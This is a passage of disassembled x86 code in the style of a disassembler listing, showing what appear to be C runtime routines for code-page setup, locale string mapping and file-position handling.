mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_41C6DB
loc_41C6D5: ; CODE XREF: sub_41C623+90�j
add ecx, dword_436488
loc_41C6DB: ; CODE XREF: sub_41C623+96�j
; sub_41C623+9F�j ...
mov eax, ecx
jmp short loc_41C6E2
; ---------------------------------------------------------------------------
loc_41C6DF: ; CODE XREF: sub_41C623+13�j
; sub_41C623+1F�j
or eax, 0FFFFFFFFh
loc_41C6E2: ; CODE XREF: sub_41C623+BA�j
pop ebx
leave
retn
sub_41C623 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C6E5 proc near ; CODE XREF: sub_41CAB9+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41C87E ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, dword_493FA0
mov [ebp+arg_0], esi
jz loc_41C872
xor ebx, ebx
cmp esi, ebx
jz loc_41C868
xor edx, edx
mov eax, offset dword_435FB8
loc_41C719: ; CODE XREF: sub_41C6E5+41�j
cmp [eax], esi
jz short loc_41C78F
add eax, 30h
inc edx
cmp eax, offset dword_4360A8
jl short loc_41C719
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_495468 ; GetCPInfo
cmp eax, 1
jnz loc_41C860
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_494140
cmp [ebp+var_18], 1
mov dword_493FA0, esi
rep stosd
stosb
mov dword_494244, ebx
jbe loc_41C84E
cmp [ebp+var_12], 0
jz loc_41C824
lea ecx, [ebp+var_11]
loc_41C76C: ; CODE XREF: sub_41C6E5+139�j
mov dl, [ecx]
test dl, dl
jz loc_41C824
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_41C77D: ; CODE XREF: sub_41C6E5+A8�j
cmp eax, edx
ja loc_41C818
or byte_494141[eax], 4
inc eax
jmp short loc_41C77D
; ---------------------------------------------------------------------------
loc_41C78F: ; CODE XREF: sub_41C6E5+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_494140
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_435FC8[esi]
loc_41C7AB: ; CODE XREF: sub_41C6E5+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_41C7DE
loc_41C7B2: ; CODE XREF: sub_41C6E5+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_41C7DE
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_41C7D7
mov edx, [ebp+var_4]
mov dl, byte_435FB0[edx]
loc_41C7CC: ; CODE XREF: sub_41C6E5+F0�j
or byte_494141[eax], dl
inc eax
cmp eax, edi
jbe short loc_41C7CC
loc_41C7D7: ; CODE XREF: sub_41C6E5+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_41C7B2
loc_41C7DE: ; CODE XREF: sub_41C6E5+CB�j
; sub_41C6E5+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_41C7AB
mov eax, [ebp+arg_0]
mov dword_49402C, 1
push eax
mov dword_493FA0, eax
call sub_41C8C8
lea esi, dword_435FBC[esi]
mov edi, offset dword_494020
movsd
movsd
pop ecx
mov dword_494244, eax
movsd
jmp short loc_41C86D
; ---------------------------------------------------------------------------
loc_41C818: ; CODE XREF: sub_41C6E5+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41C76C
loc_41C824: ; CODE XREF: sub_41C6E5+7E�j
; sub_41C6E5+8B�j
push 1
pop eax
loc_41C827: ; CODE XREF: sub_41C6E5+14F�j
or byte_494141[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_41C827
push esi
call sub_41C8C8
pop ecx
mov dword_494244, eax
mov dword_49402C, 1
jmp short loc_41C854
; ---------------------------------------------------------------------------
loc_41C84E: ; CODE XREF: sub_41C6E5+74�j
mov dword_49402C, ebx
loc_41C854: ; CODE XREF: sub_41C6E5+167�j
xor eax, eax
mov edi, offset dword_494020
stosd
stosd
stosd
jmp short loc_41C86D
; ---------------------------------------------------------------------------
loc_41C860: ; CODE XREF: sub_41C6E5+51�j
cmp dword_492874, ebx
jz short loc_41C876
loc_41C868: ; CODE XREF: sub_41C6E5+27�j
call sub_41C8FB
loc_41C86D: ; CODE XREF: sub_41C6E5+131�j
; sub_41C6E5+179�j
call sub_41C924
loc_41C872: ; CODE XREF: sub_41C6E5+1D�j
xor eax, eax
jmp short loc_41C879
; ---------------------------------------------------------------------------
loc_41C876: ; CODE XREF: sub_41C6E5+181�j
or eax, 0FFFFFFFFh
loc_41C879: ; CODE XREF: sub_41C6E5+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C6E5 endp
; =============== S U B R O U T I N E =======================================
sub_41C87E proc near ; CODE XREF: sub_41C6E5+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_492874, 0
cmp eax, 0FFFFFFFEh
jnz short loc_41C89E
mov dword_492874, 1
jmp ds:dword_495470
; ---------------------------------------------------------------------------
loc_41C89E: ; CODE XREF: sub_41C87E+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_41C8B3
mov dword_492874, 1
jmp ds:dword_49546C
; ---------------------------------------------------------------------------
loc_41C8B3: ; CODE XREF: sub_41C87E+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_41C8C7
mov eax, dword_49289C
mov dword_492874, 1
locret_41C8C7: ; CODE XREF: sub_41C87E+38�j
retn
sub_41C87E endp
; =============== S U B R O U T I N E =======================================
sub_41C8C8 proc near ; CODE XREF: sub_41C6E5+118�p
; sub_41C6E5+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_41C8F5
sub eax, 4
jz short loc_41C8EF
sub eax, 0Dh
jz short loc_41C8E9
dec eax
jz short loc_41C8E3
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C8E3: ; CODE XREF: sub_41C8C8+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41C8E9: ; CODE XREF: sub_41C8C8+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41C8EF: ; CODE XREF: sub_41C8C8+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_41C8F5: ; CODE XREF: sub_41C8C8+9�j
mov eax, 411h
retn
sub_41C8C8 endp
; =============== S U B R O U T I N E =======================================
sub_41C8FB proc near ; CODE XREF: sub_41C6E5:loc_41C868�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_494140
rep stosd
stosb
xor eax, eax
mov edi, offset dword_494020
mov dword_493FA0, eax
mov dword_49402C, eax
mov dword_494244, eax
stosd
stosd
stosd
pop edi
retn
sub_41C8FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C924 proc near ; CODE XREF: sub_41C6E5:loc_41C86D�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_493FA0
call ds:dword_495468 ; GetCPInfo
cmp eax, 1
jnz loc_41CA5D
xor eax, eax
mov esi, 100h
loc_41C94E: ; CODE XREF: sub_41C924+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_41C94E
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_41C99F
push ebx
push edi
lea edx, [ebp+var_D]
loc_41C96D: ; CODE XREF: sub_41C924+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41C994
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41C994: ; CODE XREF: sub_41C924+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_41C96D
pop edi
pop ebx
loc_41C99F: ; CODE XREF: sub_41C924+42�j
push 0
lea eax, [ebp+var_514]
push dword_494244
push dword_493FA0
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_41EACD
push 0
lea eax, [ebp+var_214]
push dword_493FA0
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_494244
call sub_41CC29
push 0
lea eax, [ebp+var_314]
push dword_493FA0
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_494244
call sub_41CC29
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_41CA1A: ; CODE XREF: sub_41C924+135�j
mov dx, [ecx]
test dl, 1
jz short loc_41CA38
or byte_494141[eax], 10h
mov dl, [ebp+eax+var_214]
loc_41CA30: ; CODE XREF: sub_41C924+127�j
mov byte_494040[eax], dl
jmp short loc_41CA54
; ---------------------------------------------------------------------------
loc_41CA38: ; CODE XREF: sub_41C924+FC�j
test dl, 2
jz short loc_41CA4D
or byte_494141[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_41CA30
; ---------------------------------------------------------------------------
loc_41CA4D: ; CODE XREF: sub_41C924+117�j
and byte_494040[eax], 0
loc_41CA54: ; CODE XREF: sub_41C924+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_41CA1A
jmp short loc_41CAA6
; ---------------------------------------------------------------------------
loc_41CA5D: ; CODE XREF: sub_41C924+1D�j
xor eax, eax
mov esi, 100h
loc_41CA64: ; CODE XREF: sub_41C924+180�j
cmp eax, 41h
jb short loc_41CA82
cmp eax, 5Ah
ja short loc_41CA82
or byte_494141[eax], 10h
mov cl, al
add cl, 20h
loc_41CA7A: ; CODE XREF: sub_41C924+174�j
mov byte_494040[eax], cl
jmp short loc_41CAA1
; ---------------------------------------------------------------------------
loc_41CA82: ; CODE XREF: sub_41C924+143�j
; sub_41C924+148�j
cmp eax, 61h
jb short loc_41CA9A
cmp eax, 7Ah
ja short loc_41CA9A
or byte_494141[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41CA7A
; ---------------------------------------------------------------------------
loc_41CA9A: ; CODE XREF: sub_41C924+161�j
; sub_41C924+166�j
and byte_494040[eax], 0
loc_41CAA1: ; CODE XREF: sub_41C924+15C�j
inc eax
cmp eax, esi
jb short loc_41CA64
loc_41CAA6: ; CODE XREF: sub_41C924+137�j
pop esi
leave
retn
sub_41C924 endp
; ---------------------------------------------------------------------------
mov eax, dword_49402C
neg eax
sbb eax, eax
and eax, dword_493FA0
retn
; =============== S U B R O U T I N E =======================================
sub_41CAB9 proc near ; CODE XREF: sub_41D1EE+9�p
; sub_41D246+D�p ...
cmp dword_494294, 0
jnz short locret_41CAD4
push 0FFFFFFFDh
call sub_41C6E5
pop ecx
mov dword_494294, 1
locret_41CAD4: ; CODE XREF: sub_41CAB9+7�j
retn
sub_41CAB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CAD5 proc near ; CODE XREF: sub_417900+2B�p
; sub_417900+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp dword_49402C, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_41CAF9
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_416A10
add esp, 0Ch
jmp short loc_41CB5C
; ---------------------------------------------------------------------------
loc_41CAF9: ; CODE XREF: sub_41CAD5+11�j
mov edx, [ebp+arg_8]
push esi
test edx, edx
jz short loc_41CB3E
mov ecx, [ebp+arg_4]
loc_41CB04: ; CODE XREF: sub_41CAD5+5B�j
mov al, [ecx]
dec edx
movzx esi, al
test byte_494141[esi], 4
mov [edi], al
jz short loc_41CB28
inc edi
inc ecx
test edx, edx
jz short loc_41CB34
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_41CB3A
jmp short loc_41CB2E
; ---------------------------------------------------------------------------
loc_41CB28: ; CODE XREF: sub_41CAD5+3E�j
inc edi
inc ecx
test al, al
jz short loc_41CB3E
loc_41CB2E: ; CODE XREF: sub_41CAD5+51�j
test edx, edx
jnz short loc_41CB04
jmp short loc_41CB3E
; ---------------------------------------------------------------------------
loc_41CB34: ; CODE XREF: sub_41CAD5+44�j
and byte ptr [edi-1], 0
jmp short loc_41CB3E
; ---------------------------------------------------------------------------
loc_41CB3A: ; CODE XREF: sub_41CAD5+4F�j
and byte ptr [edi-2], 0
loc_41CB3E: ; CODE XREF: sub_41CAD5+2A�j
; sub_41CAD5+57�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_41CB59
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_41CB59: ; CODE XREF: sub_41CAD5+6F�j
mov eax, [ebp+arg_0]
loc_41CB5C: ; CODE XREF: sub_41CAD5+22�j
pop edi
pop ebp
retn
sub_41CAD5 endp
; =============== S U B R O U T I N E =======================================
sub_41CB5F proc near ; CODE XREF: sub_417AD3+8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41E5C2
test eax, eax
pop ecx
jz short loc_41CBE8
cmp esi, offset dword_436220
jnz short loc_41CB7D
xor eax, eax
jmp short loc_41CB88
; ---------------------------------------------------------------------------
loc_41CB7D: ; CODE XREF: sub_41CB5F+18�j
cmp esi, offset dword_436240
jnz short loc_41CBE8
push 1
pop eax
loc_41CB88: ; CODE XREF: sub_41CB5F+1C�j
inc dword_4929E8
test word ptr [esi+0Ch], 10Ch
jnz short loc_41CBE8
cmp dword_492878[eax*4], 0
push ebx
push edi
lea edi, ds:492878h[eax*4]
mov ebx, 1000h
jnz short loc_41CBCE
push ebx
call sub_415CF8
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_41CBCE
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_41CBDB
; ---------------------------------------------------------------------------
loc_41CBCE: ; CODE XREF: sub_41CB5F+4D�j
; sub_41CB5F+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_41CBDB: ; CODE XREF: sub_41CB5F+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CBE8: ; CODE XREF: sub_41CB5F+10�j
; sub_41CB5F+24�j ...
xor eax, eax
pop esi
retn
sub_41CB5F endp
; =============== S U B R O U T I N E =======================================
sub_41CBEC proc near ; CODE XREF: sub_417AD3+24�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_41CC16
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41CC27
push esi
call sub_41BF5F
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CC16: ; CODE XREF: sub_41CBEC+6�j
mov eax, [esp+4+arg_4]
test byte ptr [eax+0Dh], 10h
jz short loc_41CC27
push eax
call sub_41BF5F
pop ecx
loc_41CC27: ; CODE XREF: sub_41CBEC+10�j
; sub_41CBEC+32�j
pop esi
retn
sub_41CBEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CC29 proc near ; CODE XREF: sub_417C24+A3�p
; sub_41C557+A5�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427828
push offset sub_41D854
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_492880, edi
jnz short loc_41CC9F
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_427824
mov esi, 100h
push esi
push edi
call ds:dword_495478 ; LCMapStringW
test eax, eax
jz short loc_41CC7D
mov dword_492880, ebx
jmp short loc_41CC9F
; ---------------------------------------------------------------------------
loc_41CC7D: ; CODE XREF: sub_41CC29+4A�j
push edi
push edi
push ebx
push offset dword_4370B8
push esi
push edi
call ds:dword_495474 ; LCMapStringA
test eax, eax
jz loc_41CDB7
mov dword_492880, 2
loc_41CC9F: ; CODE XREF: sub_41CC29+2E�j
; sub_41CC29+52�j
cmp [ebp+arg_C], edi
jle short loc_41CCB4
push [ebp+arg_C]
push [ebp+arg_8]
call sub_41CE4D
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_41CCB4: ; CODE XREF: sub_41CC29+79�j
mov eax, dword_492880
cmp eax, 2
jnz short loc_41CCDB
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_495474 ; LCMapStringA
jmp loc_41CDB9
; ---------------------------------------------------------------------------
loc_41CCDB: ; CODE XREF: sub_41CC29+93�j
cmp eax, 1
jnz loc_41CDB7
cmp [ebp+arg_18], edi
jnz short loc_41CCF1
mov eax, dword_49289C
mov [ebp+arg_18], eax
loc_41CCF1: ; CODE XREF: sub_41CC29+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_4953EC ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_41CDB7
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_416880
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41CD4C
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_41CD4C: ; CODE XREF: sub_41CC29+10E�j
cmp [ebp+var_24], edi
jz short loc_41CDB7
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_4953EC ; MultiByteToWideChar
test eax, eax
jz short loc_41CDB7
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_495478 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_41CDB7
test byte ptr [ebp+arg_4+1], 4
jz short loc_41CDCB
cmp [ebp+arg_14], edi
jz loc_41CE46
cmp esi, [ebp+arg_14]
jg short loc_41CDB7
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_495478 ; LCMapStringW
test eax, eax
jnz loc_41CE46
loc_41CDB7: ; CODE XREF: sub_41CC29+66�j
; sub_41CC29+B5�j ...
xor eax, eax
loc_41CDB9: ; CODE XREF: sub_41CC29+AD�j
; sub_41CC29+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41CDCB: ; CODE XREF: sub_41CC29+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_416880
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41CDFF
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_41CDFF: ; CODE XREF: sub_41CC29+1C2�j
cmp ebx, edi
jz short loc_41CDB7
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_495478 ; LCMapStringW
test eax, eax
jz short loc_41CDB7
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_41CE26
push edi
push edi
jmp short loc_41CE2C
; ---------------------------------------------------------------------------
loc_41CE26: ; CODE XREF: sub_41CC29+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41CE2C: ; CODE XREF: sub_41CC29+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_4953E8 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_41CDB7
loc_41CE46: ; CODE XREF: sub_41CC29+165�j
; sub_41CC29+188�j
mov eax, esi
jmp loc_41CDB9
sub_41CC29 endp
; =============== S U B R O U T I N E =======================================
sub_41CE4D proc near ; CODE XREF: sub_41CC29+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_41CE6A
loc_41CE5D: ; CODE XREF: sub_41CE4D+1B�j
cmp byte ptr [eax], 0
jz short loc_41CE6A
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_41CE5D
loc_41CE6A: ; CODE XREF: sub_41CE4D+E�j
; sub_41CE4D+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_41CE75
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_41CE75: ; CODE XREF: sub_41CE4D+21�j
mov eax, edx
retn
sub_41CE4D endp
; =============== S U B R O U T I N E =======================================
sub_41CE78 proc near ; CODE XREF: sub_417E44+67�p
; sub_41A9D8+CD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, dword_493F9C
push esi
push edi
jnb short loc_41CEFA
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:493E60h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_41CEFA
push eax
call sub_41ED9C
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41CEBC
mov dword_4927F4, 9
jmp short loc_41CF0B
; ---------------------------------------------------------------------------
loc_41CEBC: ; CODE XREF: sub_41CE78+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call ds:dword_495390 ; SetFilePointer
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41CEDC
call ds:dword_495328 ; RtlGetLastWin32Error
jmp short loc_41CEDE
; ---------------------------------------------------------------------------
loc_41CEDC: ; CODE XREF: sub_41CE78+5A�j
xor eax, eax
loc_41CEDE: ; CODE XREF: sub_41CE78+62�j
test eax, eax
jz short loc_41CEEB
push eax
call sub_41C4E8
pop ecx
jmp short loc_41CF0B
; ---------------------------------------------------------------------------
loc_41CEEB: ; CODE XREF: sub_41CE78+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_41CF0E
; ---------------------------------------------------------------------------
loc_41CEFA: ; CODE XREF: sub_41CE78+D�j
; sub_41CE78+2A�j
and dword_4927F8, 0
mov dword_4927F4, 9
loc_41CF0B: ; CODE XREF: sub_41CE78+42�j
; sub_41CE78+71�j
or eax, 0FFFFFFFFh
loc_41CF0E: ; CODE XREF: sub_41CE78+80�j
pop edi
pop esi
pop ebx
retn
sub_41CE78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CF12 proc near ; CODE XREF: sub_417E44+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_41CF2E
mov [edi+4], ebx
loc_41CF2E: ; CODE XREF: sub_41CF12+17�j
push 1
push ebx
push esi
call sub_41CE78
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_41CF9C
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_41CF53
sub eax, [edi+4]
jmp loc_41D065
; ---------------------------------------------------------------------------
loc_41CF53: ; CODE XREF: sub_41CF12+37�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp+var_8], ebx
jz short loc_41CF8D
mov edx, esi
mov ebx, esi
sar edx, 5
and ebx, 1Fh
mov edx, dword_493E60[edx*4]
test byte ptr [edx+ebx*8+4], 80h
jz short loc_41CFA4
mov edx, ecx
loc_41CF7E: ; CODE XREF: sub_41CF12+79�j
cmp edx, eax
jnb short loc_41CFA4
cmp byte ptr [edx], 0Ah
jnz short loc_41CF8A
inc [ebp+var_8]
loc_41CF8A: ; CODE XREF: sub_41CF12+73�j
inc edx
jmp short loc_41CF7E
; ---------------------------------------------------------------------------
loc_41CF8D: ; CODE XREF: sub_41CF12+50�j
test dl, 80h
jnz short loc_41CFA4
mov dword_4927F4, 16h
loc_41CF9C: ; CODE XREF: sub_41CF12+2D�j
or eax, 0FFFFFFFFh
jmp loc_41D065
; ---------------------------------------------------------------------------
loc_41CFA4: ; CODE XREF: sub_41CF12+68�j
; sub_41CF12+6E�j ...
cmp [ebp+var_4], 0
jnz short loc_41CFB2
mov eax, [ebp+var_8]
jmp loc_41D065
; ---------------------------------------------------------------------------
loc_41CFB2: ; CODE XREF: sub_41CF12+96�j
test byte ptr [edi+0Ch], 1
jz loc_41D05D
mov edx, [edi+4]
test edx, edx
jnz short loc_41CFCB
and [ebp+var_8], edx
jmp loc_41D05D
; ---------------------------------------------------------------------------
loc_41CFCB: ; CODE XREF: sub_41CF12+AF�j
sub eax, ecx
add eax, edx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:493E60h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [esi+eax+4], 80h
jz short loc_41D057
push 2
push 0
push [ebp+var_C]
call sub_41CE78
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_41D01E
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_41D009: ; CODE XREF: sub_41CF12+104�j
cmp eax, ecx
jnb short loc_41D018
cmp byte ptr [eax], 0Ah
jnz short loc_41D015
inc [ebp+arg_0]
loc_41D015: ; CODE XREF: sub_41CF12+FE�j
inc eax
jmp short loc_41D009
; ---------------------------------------------------------------------------
loc_41D018: ; CODE XREF: sub_41CF12+F9�j
test byte ptr [edi+0Dh], 20h
jmp short loc_41D052
; ---------------------------------------------------------------------------
loc_41D01E: ; CODE XREF: sub_41CF12+ED�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_41CE78
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41D045
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41D045
test ch, 4
jz short loc_41D048
loc_41D045: ; CODE XREF: sub_41CF12+124�j
; sub_41CF12+12C�j
mov eax, [edi+18h]
loc_41D048: ; CODE XREF: sub_41CF12+131�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_41D052: ; CODE XREF: sub_41CF12+10A�j
jz short loc_41D057
inc [ebp+arg_0]
loc_41D057: ; CODE XREF: sub_41CF12+D9�j
; sub_41CF12:loc_41D052�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_41D05D: ; CODE XREF: sub_41CF12+A4�j
; sub_41CF12+B4�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41D065: ; CODE XREF: sub_41CF12+3C�j
; sub_41CF12+8D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41CF12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D06A proc near ; CODE XREF: sub_417ED0+E3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_41D1AB
test eax, eax
pop ecx
jz loc_41D19F
mov ebx, [eax+8]
test ebx, ebx
jz loc_41D19F
cmp ebx, 5
jnz short loc_41D09B
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_41D1A8
; ---------------------------------------------------------------------------
loc_41D09B: ; CODE XREF: sub_41D06A+23�j
cmp ebx, 1
jz loc_41D19A
mov ecx, dword_4928A4
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov dword_4928A4, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_41D18A
mov ecx, dword_436120
mov edx, dword_436124
add edx, ecx
push esi
cmp ecx, edx
jge short loc_41D0EA
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:4360B0h[esi*4]
loc_41D0E1: ; CODE XREF: sub_41D06A+7E�j
